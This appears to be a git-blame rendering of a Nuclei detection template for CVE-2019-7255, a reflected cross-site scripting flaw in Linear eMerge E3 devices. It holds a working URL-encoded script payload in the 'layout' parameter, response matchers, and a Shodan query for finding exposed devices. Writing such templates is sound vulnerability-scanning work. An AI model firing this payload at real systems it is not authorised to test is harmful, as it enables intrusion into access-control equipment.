2022-08-30 17:56:28 +00:00
|
|
|
id: CVE-2019-7255
|
|
|
|
|
|
|
|
info:
|
2022-09-09 17:34:37 +00:00
|
|
|
name: Linear eMerge E3 - Cross-Site Scripting
|
2022-08-30 17:56:28 +00:00
|
|
|
author: arafatansari
|
|
|
|
severity: medium
|
2022-08-30 18:08:35 +00:00
|
|
|
description: |
|
2022-09-10 01:55:52 +00:00
|
|
|
Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter.
|
2022-08-30 17:56:28 +00:00
|
|
|
reference:
|
|
|
|
- https://www.applied-risk.com/resources/ar-2019-005
|
2022-09-10 01:55:52 +00:00
|
|
|
- https://applied-risk.com/labs/advisories
|
2022-08-30 17:56:28 +00:00
|
|
|
- https://packetstormsecurity.com/files/155253/Linear-eMerge-E3-1.00-06-Cross-Site-Scripting.html
|
2022-08-30 18:08:35 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-7255
|
|
|
|
classification:
|
2022-10-14 09:24:23 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-08-31 19:40:58 +00:00
|
|
|
cvss-score: 6.1
|
2022-08-30 18:08:35 +00:00
|
|
|
cve-id: CVE-2019-7255
|
2022-08-31 19:40:58 +00:00
|
|
|
cwe-id: CWE-79
|
2023-04-12 10:55:48 +00:00
|
|
|
epss-score: 0.01111
|
2022-08-30 17:56:28 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2022-08-30 18:08:35 +00:00
|
|
|
shodan-query: http.title:"eMerge"
|
2022-08-31 19:40:58 +00:00
|
|
|
verified: "true"
|
|
|
|
tags: emerge,xss,packetstorm,cve,cve2019,nortek
|
2022-08-30 17:56:28 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-08-30 17:56:28 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2022-08-30 18:08:35 +00:00
|
|
|
- "{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
2022-08-30 17:56:28 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2022-08-30 18:08:35 +00:00
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- 'Template : <script>alert(document.domain)</script>'
|
2022-08-30 17:56:28 +00:00
|
|
|
|
|
|
|
- type: word
|
2022-08-30 18:08:35 +00:00
|
|
|
part: header
|
2022-08-30 17:56:28 +00:00
|
|
|
words:
|
2022-08-30 18:08:35 +00:00
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-09-10 01:55:52 +00:00
|
|
|
|
|
|
|
# Enhanced by cs on 2022/09/08
|